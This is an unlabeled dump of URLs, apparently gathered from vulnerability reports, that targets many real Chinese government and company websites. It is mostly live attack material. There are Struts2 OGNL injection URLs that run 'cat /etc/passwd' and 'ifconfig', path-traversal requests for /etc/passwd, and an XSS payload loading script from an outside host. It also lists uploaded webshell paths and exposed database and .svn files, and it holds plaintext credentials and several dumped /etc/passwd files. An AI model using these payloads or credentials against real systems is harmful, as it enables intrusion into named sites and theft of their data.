webalizer:x:67:67:Webalizer:/var/www/usage:/sbin/nologin squid:x:23:23::/var/spool/squid:/sbin/nologin oprofile:x:16:16:Special OProfile:/home/oprofile:/sbin/nologin xfs:x:43:43:X Server:/etc/X11/fs:/sbin/nologin gdm:x:42:42::/var/gdm:/sbin/nologin sabayon:x:86:86:Sabayon user:/home/sabayon:/sbin/nologin nagios:x:500:500::/home/nagios:/bin/bash www:x:501:501::/home/www:/bin/bash http://software.sfn.cn/ http://software.sfn.cn/data/admin/ver.txt http://software.sfn.cn/data/mysql_error_trace.inc http://software.sfn.cn/sfnadmin/ http://software.sfn.cn/uploads/123.php www.sfn.com.cn localhost:3306 http://idns.sfn.cn/viplogin/vipdomain_regDns.do?redirect%3A%24%7B%23req%3D%23context.get%28%27com.opensymphony.xwork2.dispatcher.HttpServletRequest%27%29%2C%23a%3D%23req.getSession%28%29%2C%23b%3D%23a.getServletContext%28%29%2C%23c%3D%23b.getRealPath%28%22%2F%22%29%2C%23matt%3D%23context.get%28%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27%29%2C%23matt.getWriter%28%29.println%28%23c%29%2C%23matt.getWriter%28%29.flush%28%29%2C%23matt.getWriter%28%29.close%28%29%7D http://z.xywy.com/doc/plus.php?type=appoint&noregist=1&eid=153478 http://electronic.jlu.edu.cn/news.php?id=2387 http://www.xmgs.gov.cn:9090/wcm/infoview.do?serviceid=wcm6_user&MethodName=getOnlineUsers http://www.xmgs.gov.cn:9090/wcm http://www.sm.gov.cn:8080/wcm/infoview.do?serviceid=wcm6_user&MethodName=getOnlineUsers得到帐号和密码 http://www.sm.gov.cn:8080/wcm http://www.zjtax.gov.cn/wcm/infoview.do?serviceid=wcm6_user&MethodName=getOnlineUsers http://www.zjtax.gov.cn/wcm http://www.hbtcepb.gov.cn/ktgl_admin/article_news/admin/news_detail1.asp?id=332 http://www.hbtcepb.gov.cn/ktgl_admin/ http://211.136.107.91:8080/ http://xianguo.com/setting/change-email这个页面,才会发送邮件到新邮箱。 http://xianguo.com/service/submitfav/?link=http:// xss.tw/3132 http://xianguo.com/service/submitfav/?link=http://%22%3E%3C/a%3E%3Cscript%20src=//xss.tw/****%3E%3C/script%3E%3Ca%20%22,然后就可以到邮箱里收邮件啦~ 
http://rx.cmge.com/hjqstWwwAction!index?redirect%3A%24{%23req%3D%23context.get%28%27com.opensymphony.xwork2.dispatcher.HttpServletRequest%27%29%2C%23a%3D%23req.getSession%28%29%2C%23b%3D%23a.getServletContext%28%29%2C%23c%3D%23b.getRealPath%28%22%2F%22%29%2C%23matt%3D%23context.get%28%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27%29%2C%23matt.getWriter%28%29.println%28%23c%29%2C%23matt.getWriter%28%29.flush%28%29%2C%23matt.getWriter%28%29.close%28%29 inurl:registrationForm.action http://new.gfan.com/picring.php?mod=wallpaper&tagid=0 http://new.gfan.com/application.php?mod=dorenrecomment&kyyid=370 http://3g.gfan.com/admin/index.php http://game.gfan.com/admin/index.php http://baoguo.cfpa.org.cn/news.action http://www.51bi.com/space/favor/delMyBFavor.jhtml?id=27250153&status=0 http://218.97.250.37:8088/HKCKSNewsmgr/newsContent_getOneNewsRecord.action?id=721&searchFlag=2 http://www.baison.com.cn/manage/web会员门户管理系统后台 http://www.baison.com.cn/test.php http://star.baison.net/Default2.aspx貌似也存在类似注入问题 http://sales.baison.net:9006/ http://www.tomgroup.com/sql/ ext:lp:lp_netErrorInfo:#_NETWORK_FAIL_INFO_#;Url=http://www.wooyun.org;IP=null;IPNum=0 ext:lp:lp_netErrorInfo:#_NETWORK_FAIL_INFO_#;Url=http://www.wooyun.org;IP=null;IPNum=0 ext:uc_dw:http://www.evil.com/evil.apk ext:uc_dw:http://fuzzing.duapp.com/evil.txt%E3%80%80%E3%80%80%E3%80%80%E3%80%80%E3%80%80%E3%80%80%E3%80%80%E3%80%80%E3%80%80%E3%80%80%E3%80%80%E3%80%80%E3%80%80%E3%80%80%E3%80%80.html"/ http://zhidao.zgsj.com/editadmin http://webmail13.189.cn http://pass.tom.com/safeBind.php?action=add1&email2=youremailhere@wooyun.org http://www.goheee.com/admin/menu.htm http://www.kuaidianding.com/diet/bottom_electronicBulletin.action http://www.flysaa.com/cn/zh_cn/home.action?request_locale=zh_cn_CN pplms.cn/v/admin http://nokia-imaging.tom.com.cn/manage/ http://ulehk.beta.ulechina.tom.com/search/get.do http://ulehk.beta.ulechina.tom.com/m.jsp http://223.4.115.110 http://223.4.115.110/jichang.rar 
http://www.hbhk.com.cn/articleDetail.action http://invoice.skype.tom.com http://www.appchina.com/ http://analytics.tomonline-inc.com/phpmyadmin http://analytics.tomonline-inc.com/doc http://cq.189.cn/mall/user/address(需要登录) http://cq.189.cn/mall/user/address/edit?id=1893 http://cq.189.cn/pay/bestcz.htm http://zone.wooyun.org/index.php?do=action&act=editfield http://m.tom.cn/appweb/book/xiazai.jsp?s=79 http://m.tom.cn/d.jsp?s=12 http://m.tom.cn/d?s=11 http://manhua.7k7k.com/support/wrong.php?vid=198 http://iwatchome.tom.com/WristWatch_paper2.php?talk_id=2191 http://qyqk.chinasafety.gov.cn/ http://tp6.znimg.com//upload//home//201307//2721//e34c97fe6ccf177f.jpg/1.php http://g.gfan.com/admin/index.php?act=login http://wan.tgbus.com/fh/gamekey.php?aid=225176 http://cat.mamabb.com/ http://jzcs.51web.com/news/html/?'405.html http://twdata.nba.tom.com/phpmyadmin/ http://www.shehr.com.cn/teachercapacity/guestbook_detail.php?id=54936 http://lepai.eastmoney.com/Auction/survey.do root:x:0:0:root:/root:/bin/bash bin:x:1:1:bin:/bin:/sbin/nologin daemon:x:2:2:daemon:/sbin:/sbin/nologin adm:x:3:4:adm:/var/adm:/sbin/nologin lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin sync:x:5:0:sync:/sbin:/bin/sync shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown halt:x:7:0:halt:/sbin:/sbin/halt mail:x:8:12:mail:/var/spool/mail:/sbin/nologin news:x:9:13:news:/etc/news uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin operator:x:11:0:operator:/root:/sbin/nologin games:x:12:100:games:/usr/games:/sbin/nologin gopher:x:13:30:gopher:/var/gopher:/sbin/nologin ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin nobody:x:99:99:Nobody:/:/sbin/nologin nscd:x:28:28:NSCD Daemon:/:/sbin/nologin vcsa:x:69:69:virtual owner:/dev:/sbin/nologin pcap:x:77:77::/var/arpwatch:/sbin/nologin rpc:x:32:32:Portmapper user:/:/sbin/nologin mailnull:x:47:47::/var/spool/mqueue:/sbin/nologin smmsp:x:51:51::/var/spool/mqueue:/sbin/nologin rpcuser:x:29:29:RPC User:/var/lib/nfs:/sbin/nologin nfsnobody:x:4294967294:4294967294:Anonymous 
User:/var/lib/nfs:/sbin/nologin sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin ntp:x:38:38::/etc/ntp:/sbin/nologin dbus:x:81:81:System bus:/:/sbin/nologin avahi:x:70:70:Avahi daemon:/:/sbin/nologin haldaemon:x:68:68:HAL daemon:/:/sbin/nologin gdm:x:42:42::/var/gdm:/sbin/nologin avahi-autoipd:x:100:103:avahi-autoipd:/var/lib/avahi-autoipd:/sbin/nologin xfs:x:43:43:X Server:/etc/X11/fs:/sbin/nologin aduser:x:500:0::/home/aduser:/bin/bash http://lepai.eastmoney.com/Auction/guige.jsp http://211.136.152.186/ http://211.136.152.186/pplll.asp http://www.ccets.org http://www.ccets.org/images/bank/vip.asp?x=x http://www.fingerage.com/admin/main.html http://218.242.57.205:8087/forum.php http://218.242.57.205:8080/xampp/index.php http://218.242.57.205:8080/xampp/cds-fpdf.php http://my.csdn.net/my/favorite),点击添加 http://my.csdn.net/u011311506),可以看到,作为个人动态,属性原封不动地写了出来 http://wooyun.org http://website.tkamc.taikang.com/tkweb/accodoupload.do url:http://117.79.151.11/admin/index.php?mod=dns user:admin pass:12345678 http://dns3.baofeng.net http://db.tgbus.com/dota2/s?w=1 http://db.tgbus.com/wow/items.html?q=%E7%B2%97%E7%B3%99&c=88952634&s=88952634 http://db.tgbus.com/wow/achievements.aspx?prename=1% http://drops.wooyun.org/tips/143 http://www.zjly.gov.cn/index.do http://www.51diancai.com/userHelp_contactUs.action http://www.sxinfo.gov.cn/book/zxdc/Com_add.do http://user.sanwen8.cn/manage/showdraft?aid=111275 http://user.sanwen8.cn/manage/showdraft?aid=111275 http://user.sanwen8.cn/manage/showdraft?aid=111275 http://wenda.qumaiya.com/ask/reply/wenid/330 http://rank.7k7k.com/article.php?id=23 http://jiumei.com/user/user_showlogin.shtml http://www.22.cn/ https://112.11.126.22:443/ 
http://www.cfc108.com/zxjt/gotoYYT.action?redirect%3A%24%7B%23req%3D%23context.get%28%27com.opensymphony.xwork2.dispatcher.HttpServletRequest%27%29%2C%23a%3D%23req.getSession%28%29%2C%23b%3D%23a.getServletContext%28%29%2C%23c%3D%23b.getRealPath%28%22%2F%22%29%2C%23matt%3D%23context.get%28%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27%29%2C%23matt.getWriter%28%29.println%28%23c%29%2C%23matt.getWriter%28%29.flush%28%29%2C%23matt.getWriter%28%29.close%28%29%7D http://www.cfc108.com/zxjt/gotoYYT.action?redirect:$ http://pic.gmw.cn/ucenter/cameraman!home.do root:x:0:0:root:/root:/bin/bash bin:x:1:1:bin:/bin:/sbin/nologin daemon:x:2:2:daemon:/sbin:/sbin/nologin adm:x:3:4:adm:/var/adm:/sbin/nologin lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin sync:x:5:0:sync:/sbin:/bin/sync shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown halt:x:7:0:halt:/sbin:/sbin/halt mail:x:8:12:mail:/var/spool/mail:/sbin/nologin news:x:9:13:news:/etc/news uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin operator:x:11:0:operator:/root:/sbin/nologin games:x:12:100:games:/usr/games:/sbin/nologin gopher:x:13:30:gopher:/var/gopher:/sbin/nologin ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin nobody:x:99:99:Nobody:/:/sbin/nologin nscd:x:28:28:NSCD Daemon:/:/sbin/nologin vcsa:x:69:69:virtual owner:/dev:/sbin/nologin pcap:x:77:77::/var/arpwatch:/sbin/nologin rpc:x:32:32:Portmapper user:/:/sbin/nologin apache:x:48:48:Apache:/var/www:/sbin/nologin mailnull:x:47:47::/var/spool/mqueue:/sbin/nologin smmsp:x:51:51::/var/spool/mqueue:/sbin/nologin ntp:x:38:38::/etc/ntp:/sbin/nologin hsqldb:x:96:96::/var/lib/hsqldb:/sbin/nologin xfs:x:43:43:X Server:/etc/X11/fs:/sbin/nologin sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin rpcuser:x:29:29:RPC User:/var/lib/nfs:/sbin/nologin nfsnobody:x:4294967294:4294967294:Anonymous User:/var/lib/nfs:/sbin/nologin dbus:x:81:81:System bus:/:/sbin/nologin avahi:x:70:70:Avahi daemon:/:/sbin/nologin haldaemon:x:68:68:HAL daemon:/:/sbin/nologin 
avahi-autoipd:x:100:102:avahi-autoipd:/var/lib/avahi-autoipd:/sbin/nologin gdm:x:42:42::/var/gdm:/sbin/nologin sabayon:x:86:86:Sabayon user:/home/sabayon:/sbin/nologin virtual:x:500:500::/home/vsftp:/bin/bash nagios:x:501:501::/home/nagios:/bin/bash http://price.online.sh.cn/product/quitmarket.do http://www.tudou.com/my/setting/notifyMe.action里的一个【以上消息可用下面方法提醒我】form http://message.tudou.com/updateEmailSetting.html?callback=jQuery16405471757907992225_1375018012075&isSend=1&frequency=14&email=XXX%40email.com&_=1375018012464 http://www.tudou.com/my/setting/notifyMe.action http://richardwiseman.wordpress.com/2013/07/22/answer-to-the-friday-puzzle-215/ http://www.squarefree.com/2012/04/16/car-free-apps/ http://zone.wooyun.org/content/5275 http://ah2.zhangyue.com/zybook/u/p/user.php?action=qiandao&Act=turn_card&key=2QM&usr=156XXX01&rgt=5&p1=1307271227XXXX74&p2=108X5&p3=63X0&p4=501603&p5=12&p6=IJIGXXXFIHD&p7=DFIFHEXXXEEC&p9=1&p15=XT615&p16=XT615&p19=ireader_2.3.1&pk= http://ah2.zhangyue.com/zybook/u/p/user.php?price=5100&key=2QM&action=qiandao&Act=registration&usr=156XXX01&rgt=5&p1=1307271227XXXX74&p2=108X5&p3=63X0&p4=501603&p5=12&p6=IJIGXXXFIHD&p7=DFIFHEXXXEEC&p9=1&p15=XT615&p16=XT615&p19=ireader_2.3.1&pk=2Q2 ext:uc_dw:http://www.evil.com/evil.html http://的页面中直接调用file://,但还是可以从http://跨到file://。POC如下 ext:wo:file:///evil.html ext:uc_dw:http://fuzzing.duapp.com/evil.html"/ http://kfmail.sdo.com/MailManage/MailSearch.aspx http://photo.189.cn/default.aspx http://www.dhl.com.cn/page.php?AboutId=26 http://common.51web.com/login.jsp http://common.51web.com/ http://beian.51web.com/ERS/apiAction!getAuthentication.action?timeStamp=20130729105302271&checkSum=7e040d8919ce209d7b84f07e4682c99e&useName=frank_passion&password=frankliu0203 http://pk.tom.com/web/v2flash/index_game.html http://mmbox.myuni.com.cn/ http://kingdeeone.app.mykingdee.com/account/sign-up.action http://hi.haidilao.com/logins/login.action http://www.hnlysl.gov.cn/sousuo/index.php 
http://i.house.sina.com.cn/index.php?ctrl=sendsms&act=sendsms&bkway=4&jsoncallback=jsonp1375062960656&t=1375063197011&smscontent=[自定义]400-606-6969%E8%BD%AC71706&return_url=http http://www.atbora.com/?redirect%3A%24%7B%23req%3D%23context.get%28%27com.opensymphony.xwork2.dispatcher.HttpServletRequest%27%29%2C%23a%3D%23req.getSession%28%29%2C%23b%3D%23a.getServletContext%28%29%2C%23c%3D%23b.getRealPath%28%22%2F%22%29%2C%23matt%3D%23context.get%28%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27%29%2C%23matt.getWriter%28%29.println%28%23c%29%2C%23matt.getWriter%28%29.flush%28%29%2C%23matt.getWriter%28%29.close%28%29%7D link:http://lit2.tnt.com.cn/tracker/trackandtraceInit.do http://211.138.108.116/pagesindex.action http://sswz.spb.gov.cn/login/login!link.action http://xm.zjkjt.gov.cn/redirect.action http://tjqy.scofcom.gov.cn/Investment/info/indexEntp.action http://www.xmyg.gov.cn/index.action http://kj.xjcz.gov.cn/web/resultInitWebSign.action http://www.bjcc.gov.cn/webpoll/vote.action http://www.xmjj.gov.cn/xxfw/showjdczhxxMain.action http://www.wh-price.gov.cn/cms/frontpage/price_monitor/PriceTypeList.action http://qcxx.mof.gov.cn/public.action http://vod.shqp.gov.cn/viewer/viewerLook!playMedia.action http://www.bzldbz.gov.cn/index.action http://xkpt.mot.gov.cn/default/bszn/loadBszn.action http://www.bjsupervision.gov.cn/caphtjcj/webComplaint/complaint.action http://www.ccjgdj.gov.cn/Vuser.action http://mail.haciq.gov.cn/User_Login_problem.action http://www.hnds.gov.cn/taxlawAppDownload.action http://www.hebwater.gov.cn/info/infoFrontAction.goInfoContent.action http://www.gxrft.gov.cn/listArticle.action http://changs.ccgp-hunan.gov.cn/newsAction!showFileUrlById.action http://eservice.sipac.gov.cn/loadNewsContent.action http://share.escience.gov.cn/index/pageIndex_contact.action http://www.rzdj.gov.cn/index-pic.action http://digital.zjgws.gov.cn/ZJGHEALTH/register_findDoctor.action http://www3.bjxch.gov.cn/login.action 
http://wlkt.yn.gov.cn/onlinelearn/topic_main.action http://www.jlta.gov.cn:8033/QuestionnaireSystem/Questionnaire_indexQuestionnaire.action http://www.lntl.hrss.gov.cn/page/qtnews/zcfgneirong.action http://www.csmap.gov.cn/iportal/iportalIndex.action http://www.jiangyin.gov.cn/jymh/resource/plugins/interview/interviewOnline!getAllInterview.action http://www.sdjs.gov.cn/zxzx/survey/user-view-survey-list.action http://www.hbgbzx.gov.cn/portal/info!info.action http://www.hicrj.gov.cn/ELSNetAccept/chose/showConsider_chose.action http://nycyhj.huaihua.gov.cn:8080/info/info/type.action http://www.szwzgs.gov.cn/JeecmsF/ww/nei2.action http://www.jszwgov.cn/spdt/spdt_listSp.action http://www.anhuimj.gov.cn/master/webchannel!detail.action http://jh.hljkj.cn/Yhgl_login.action http://i.baofeng.com/verify_email.html user.baofeng.com/user/?a=sendCheckMail&email=827731626%40qq.com&callback=Security.setEmailResult http://i.baofeng.com/forget_password.html http://www.caaet.cn/list!searchlist.action http://user.baofeng.com/user/?a=setQuestion&question1=%E6%9A%B4%E9%A3%8E%E5%BD%B1%E9%9F%B3&answer1=%E6%9A%B4%E9%A3%8E%E5%BD%B1%E9%9F%B3&callback=Security.setQuestionResult http://auth.baihe.com/id5/sendAuthId5.action?authedFrom=0需要登录 http://t.cn/zQJBedo http://check.inc.hc360.com/Factory/GetCAMData.aspx?refere=inc.hc360.com&factoryname=%u946b%u6cf0&phone=&fax=&mobile= http://check.inc.hc360.com/Factory/GetCAMData.aspx http://www.kingogo.cn/admin/index.php http://www.kingogo.cn/selschool.php?cate_id=123 http://iphone.wap.soufun.com/news/news.php?pageeach=6&typeid=32 http://fm-ask.kunlun.com http://crj.fjgat.gov.cn:9080/ELSNetAccept/chose/queryProgress_chose.action http://www.fzga.gov.cn:9080/ELSNetAccept/chose/showitem_event.action http://szs.siat.ac.cn/content/listContent.action http://szkh.gtja.com/Download_info.aspx?m=20130116133452530067&n=20130220153332413642 http://www.chuangxin.com/.svn/entries svn://118.***.***.205/wangchunpeng/website/www svn://118.***.***.205/wangchunpeng 
svn:special svn:externals svn:needs-lock http://www.chuangxin.com/chuangxin/.svn/text-base/wp-config.php.svn-base http://localhost/shopex4.85/api.php?act=search_dly_type&api_version=1.0 http://www.house0515.com/common/lib/FCKeditor/editor/filemanager/upload/php/upload.php http://info.rails.cn/news_detail.asp?id=20120112 http://info.rails.cn/party/news_detail.asp?id=2009022601 http://221.13.32.101/login.aspx http://221.13.32.101/WorkManage/SMSManage.aspx此页面未进行身份认证,单单修改口令还是不够的。 http://kjdb.gdaas.cn/admin/ http://www.7daysinn.cn/product_intro.html http://www.7daysinn.cn/cooperate.html http://in.7daysinn.cn/fckeditor/editor/filemanager/connectors/test.html# http://partner.7daysinn.cn/FCKeditor/editor/filemanager/connectors/test.html# www.zgsj.com http://huochepiao.114piaowu.com/index.action http://tuan.aili.com/feed.php?ename=quanguo http://tuan.27.cn/feed.php?ename=quanguo http://info.zgsj.com/admin/index.asp http://crm.114.com.cn/fckeditor/editor/filemanager/browser/default/browser.html?Type=Image&Connector=connectors/jsp/connector http://crm.114.com.cn/.svn/entries http://vq.youku.com/resin-doc/examples/ioc-periodictask/viewfile?file=index.xtp http://vq.youku.com/resin-doc/examples/ioc-periodictask/viewfile?file=WEB-INF/web.xml http://www.shenzhoupiaowu.com/index.do http://newsletter.csdn.net/show_book?id=130&type=0 http://my.csdn.net/my/album/upload中上传一张图片,抓包,把filename的后缀改为.php,但是失败了; http://my.csdn.net/my/album)进入相册,突然发现图片的标题和去掉扩展名的filename一模一样。 mikuxss.sinaapp.com/12CmMi http://www.zgsj.com/reg/forget.asp http://hudong.mywtv.cn/uc/data/avatar/000/02/52/39_avatar_small.jpg/1.php 
http://service.mtime.com/Service/Twitter.msi?Ajax_CallBack=true&Ajax_CallBackType=Mtime.Service.Pages.TwitterService&Ajax_CallBackMethod=Follow&Ajax_CrossDomain=1&Ajax_RequestUrl=http%3A%2F%2Fmy.mtime.com%2Fapp%2Ft%2Fsearch%2Fuser%2F%3Fcontent%3D%25E4%25B8%258D%25E5%25BC%25BA%26searchtype%3D0%26usertype%3D0%26locationtype%3D0%26locationid%3D0%26sex%3D-1%26minage%3D0%26maxage%3D0&t=201372913162997346&Ajax_CallBackArgument0=5875540 http://service.mtime.com/Service/Twitter.msi?Ajax_CallBack=true&Ajax_CallBackType=Mtime.Service.Pages.TwitterService&Ajax_CallBackMethod=UnFollow&Ajax_CrossDomain=1&Ajax_RequestUrl=http%3A%2F%2Fmy.mtime.com%2Fapp%2Ft%2Fsearch%2Fuser%2F%3Fcontent%3D%25E4%25B8%258D%25E5%25BC%25BA%26searchtype%3D0%26usertype%3D0%26locationtype%3D0%26locationid%3D0%26sex%3D-1%26minage%3D0%26maxage%3D0&t=201372913185796643&Ajax_CallBackArgument0=5875540 http://service.mtime.com/Service/Message.msi?Ajax_CallBack=true&Ajax_CallBackType=Mtime.Service.Pages.MessageService&Ajax_CallBackMethod=SendUserMessageToNicknameCrossDomainByFlash&Ajax_CrossDomain=1&Ajax_RequestUrl=http%3A%2F%2Fmy.mtime.com%2Fapp%2Ft%2Ffollower%2F&t=201372915233312498&Ajax_CallBackArgument0=%E4%B8%8D%E5%BC%BA&Ajax_CallBackArgument1=111111111122222222222222 http://www.nanxian.gov.cn/zfxxgk/Admin_Login.asp http://www.jdxf.gov.cn/readnews.php?newsid=6285 http://www.jdxf.gov.cn/readnews.php?newsid=6285 http://hc.csdn.net/contents/content_details?type=activities http://newsletter.csdn.net/show_book?id=130 
http://exam.xhd.cn/index/feedBack!save.do?redirect:${%23a%3d%28new%20java.lang.ProcessBuilder%28new%20java.lang.String[]{%27cat%27,%27/etc/passwd%27}%29%29.start%28%29,%23b%3d%23a.getInputStream%28%29,%23c%3dnew%20java.io.InputStreamReader%28%23b%29,%23d%3dnew%20java.io.BufferedReader%28%23c%29,%23e%3dnew%20char[50000],%23d.read%28%23e%29,%23matt%3d%23context.get%28%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27%29,%23matt.getWriter%28%29.println%28%23e%29,%23matt.getWriter%28%29.flush%28%29,%23matt.getWriter%28%29.close%28%29 http://www.suqian.gov.cn/sqapp/nrglIndex.action http://event.hd.baofeng.com/.idea/workspace.xml http://event.hd.baofeng.com/three/public/images/pic/toupiao/t6_1.jpg/1.php http://wooyun.org/bugs/wooyun-2013-027138 http://jinglao.net/phpmyadmin http://press.gapp.gov.cn:8088/press_search/pages/query/queryAction!findVerifyPaging.action http://info.rails.cn/dlopac/ExpiredList.aspx http://info.rails.cn/dl/MagazineNavigation.aspx?KayID=1 http://fk.lcxw.cn http://fk.lcxw.cn/plus/mytag_js.php?aid=9090 http://mnk.lcxw.cn http://mnk.lcxw.cn/plus/mytag_js.php?aid=9090 http://jbcx.lcxw.cn http://jbcx.lcxw.cn/plus/mytag_js.php?aid=9090 http://ebh.lcxw.cn http://lcxw.cn/ http://218.5.70.231/manage/FCKeditor/editor/filemanager/browser/default/connectors/aspx/connector.aspx?Command=GetFoldersAndFiles&Type=File&CurrentFolder=%2F http://218.5.70.231/1.asp http://www.tzsl.gov.cn/water_mesage/ http://www.tzsl.gov.cn/Manage.aspx http://analytics.tomonline-inc.com/EDM_OLD/login.html http://analytics.tomonline-inc.com/libs/editor/ http://analytics.tomonline-inc.com/phpmyadmin/setup/index.php http://analytics.tomonline-inc.com/phpmyadmin http://analytics.tomonline-inc.com/phpinfo.php http://219.234.174.162/admin/login.aspx) http://219.234.174.162/aaa.asp http://shop.skype.tom.com/fg/userspace/productQuestionList.do?actionType=ajaxquestlist&productId=bvc0235&isPage=true http://www.wugang.gov.cn/jact/front/front_mailpubdetail.action?transactId=6747&sysid=2 
http://xcb.sh.gov.cn/SSOServer/SSO/Validate_findPwdPage1.action http://www.zjjgbz.gov.cn/zjjgbz/index.do http://www.gig.gdas.ac.cn/list.asp?id=24 http://home.rails.cn/a.zip http://www.rails.cn/a.zip http://fc.wlmq.com/ http://www.lamiu.com/search.php?user_email_special=请输入Email获取最新信息&user_email=请输入Email获取最新信息&keywords=WCRTESTINPUT000000 http://tianya.lamiu.com/log.txt http://www.lamiu.com/log.txt notify_url_log:sign=f15edfc359571a20df57b972a1cff49c&mysign=f15edfc359571a20df57b972a1cff49c&0.00,1,订单号:20110708049417,2011070876888784,fsgreathill@163.com,2011-07-08 http://www.lamiu.com/readme.txt http://jtcl.js.chinamobile.com/pub/queryRings.do http://www.jhxcb.gov.cn/admin123/login.php http://www.jhxcb.gov.cn/uploads/1.asp my.weke.com/registerAction.action http://hksifaju.huanghekou.gov.cn/dede/login.php http://m.7k7k.com/ http://login.lvmama.com/nsso/findpass/index.do http://www.hmcz.gov.cn http://61.130.7.247/gpsback/index.action http://minisite.youku.com/ http://minisite.youku.com/admin1/login.php url:http://info.meadin.com/Show_Ajax_People_HotCount.asp?ids=1 http://xxfbgz.he.sgcc.com.cn:8081/index.do http://szjs.net/ZhuJian/NewAction_center.action http://211.139.229.170/sys/loginInput.action http://www.mtcsol.org/mtcsol/showSchoolList.action网址,利用struts2指令redirect即可获取服务器系统用户信息 http://www.mtcsol.org/mtcsol/showSchoolList.action?redirect:${%23a%3d%28new%20java.lang.ProcessBuilder%28new%20java.lang.String[]{%27cat%27,%27/etc/passwd%27}%29%29.start%28%29,%23b%3d%23a.getInputStream%28%29,%23c%3dnew%20java.io.InputStreamReader%28%23b%29,%23d%3dnew%20java.io.BufferedReader%28%23c%29,%23e%3dnew%20char[50000],%23d.read%28%23e%29,%23matt%3d%23context.get%28%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27%29,%23matt.getWriter%28%29.println%28%23e%29,%23matt.getWriter%28%29.flush%28%29,%23matt.getWriter%28%29.close%28%29 http://www.snqi.gov.cn/index.do http://www.sxtzsb.org/index.do http://yul.snqi.gov.cn/index.do http://yangl.snqi.gov.cn/ http://hz.snqi.gov.cn/ 
http://tc.snqi.gov.cn/ http://sl.snqi.gov.cn/ http://www.youlema.com/mc/login.action?redirect%3A%24%7B%23req%3D%23context.get%28%27com.opensymphony.xwork2.dispatcher.HttpServletRequest%27%29%2C%23a%3D%23req.getSession%28%29%2C%23b%3D%23a.getServletContext%28%29%2C%23c%3D%23b.getRealPath%28%22%2F%22%29%2C%23matt%3D%23context.get%28%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27%29%2C%23matt.getWriter%28%29.println%28%23c%29%2C%23matt.getWriter%28%29.flush%28%29%2C%23matt.getWriter%28%29.close%28%29%7D http://szxx.beijing.gov.cn:8080/bjxf_public/toRecheckQueryPortal.action http://www.sdchem.gov.cn/index.do http://mail.catr.cn/user/ http://mail.catr.cn/manage/ http://mail.catr.cn/sql/ http://mail.catr.cn/images/ http://mail.catr.cn/inc/ http://mail.catr.cn/include/ http://smscom.12321.cn:8080/shell.jsp http://www.mrsta.com/ks_data/kesioncms4.mdb http://www.mrsta.com/x.asp http://www.mrsta.com/Plus/cywx.asp http://zhibo.miit.gov.cn:8080/direct/displayLogin.do http://zhibo.miit.gov.cn:8080/direct/savepicture.do?menuid=45 http://sso.hc360.com/VerifyLoginName.html http://115.228.224.191/doc/page/login.asp http://wapchat.tom.com/wap.zip http://wapchat.tom.com/aaa.txt http://wapchat.tom.com/secret/stockt/stock.sql http://www.suning.com.cn/ListText.aspx?RID=19&BID=21 http://sso.hc360.com/VerifyLoginName.html http://sso.hc360.com/security/VerifyIdentity.html?operate=2 http://www.cnrcs.org.cn/ekecms/index.do http://shop71502621.taobao.com http://item.taobao.com/item.htm?id=19398782995 http://baidu798.duapp.com转换成淘客链接 
http://www.gouwuke.com/tuangou/index.do?redirect:${%23a%3d%28new%20java.lang.ProcessBuilder%28%22ifconfig%22%29%29.start%28%29,%23b%3d%23a.getInputStream%28%29,%23c%3dnew%20java.io.InputStreamReader%28%23b%29,%23d%3dnew%20java.io.BufferedReader%28%23c%29,%23e%3dnew%20char[50000],%23d.read%28%23e%29,%23matt%3d%23context.get%28%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27%29,%23matt.getWriter%28%29.println%28%23e%29,%23matt.getWriter%28%29.flush%28%29,%23matt.getWriter%28%29.close%28%29 http://www.gsjtzb.com/index.do id.uc.cn/xxxxxx http://www.tskj.com.cn/ http://60.2.205.250:83/tskjjh/index/index!index.do http://www.phagd.org/index.do http://www.scwater.gov.cn/index.do http://www.zbboftec.gov.cn:7080/jmj/index.do www.sheitc.gov.cn/index.do http://www.sx12396.com/index.do http://www.sx12396.com/ma.jsp http://www.spgbid.com/spgbid/homeAction/searchAction.action?search=search&msg= http://onlineexam.teacher.com.cn/logout.action http://elearning.teacher.com.cn/cms/detail/index.action http://elearning.teacher.com.cn/admin/register/index.action http://elearning.teacher.com.cn/cms/detail/articleDetail.action http://ver.teacher.com.cn/teacher/front/content.action http://cks.mof.gov.cn/ http://cks.mof.gov.cn/crifs/content/docmanage/download.jsp?filePath=../../../../../../etc/passwd http://www.hnea.gov.cn/ http://www.hnea.gov.cn/manage/content/docmanage/download.jsp?filePath=/tzgg/200901/../../../../../../etc/passwd http://www.beidaihe.gov.cn/newbdh/index.do http://www.gdwater.gov.cn:8080/xzxkpub/open/index.do http://www.shcaee.com/ http://61.138.203.166/downMoneytemplate.action http://mp.ctvap.cn/login!login.html http://www.paulownia.ac.cn/showNews!show.action http://218.7.6.54:8083/traffic/webwork/forestdt/loginmain!zhongbiaomany.action http://kjcg.scst.gov.cn:83/getPortalInfo.action?porId=41 http://wap.cnmo.com/list.php?classid=34&sortid=35 http://wap.cnmo.com/list.php?classid=100&sortid=5&platform=5 http://m.xgo.com.cn/index.php?c=Dealer&kind=1 
